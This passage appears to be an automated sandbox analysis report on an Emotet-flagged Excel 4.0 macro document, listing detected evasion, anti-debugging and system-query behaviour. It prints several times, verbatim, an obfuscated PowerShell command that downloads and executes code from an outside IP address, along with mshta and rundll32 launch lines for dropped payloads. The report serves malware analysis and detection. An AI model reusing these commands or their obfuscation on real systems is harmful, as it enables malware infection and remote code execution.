Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 1312 Thread sleep time: -300000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000006.00000002.674855596.000000000013E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D4087 mov eax, dword ptr fs:[00000030h] 9_2_002D4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00214087 mov eax, dword ptr fs:[00000030h] 10_2_00214087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274087 mov eax, dword ptr fs:[00000030h] 11_2_00274087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00364087 mov eax, dword ptr fs:[00000030h] 12_2_00364087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254087 mov eax, dword ptr fs:[00000030h] 14_2_00254087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00194087 mov eax, dword ptr fs:[00000030h] 15_2_00194087
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zqqw/zaas/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: imedpub_2.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 10.2.rundll32.exe.2f10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.370000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.aa0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f10000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2580000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.25f0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.25f0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.310000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2f50000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.420000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.790000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2670000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.28f0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.9d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2fd0000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.330000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2670000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2620000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.25f0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2f50000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f60000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a70000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c40000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2480000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ad0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.790000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.220000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f90000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2480000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.310000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.29f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2580000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.ab0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fc0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.a80000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.25c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.220000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b40000.8.unpack, type: UNPACKEDPE
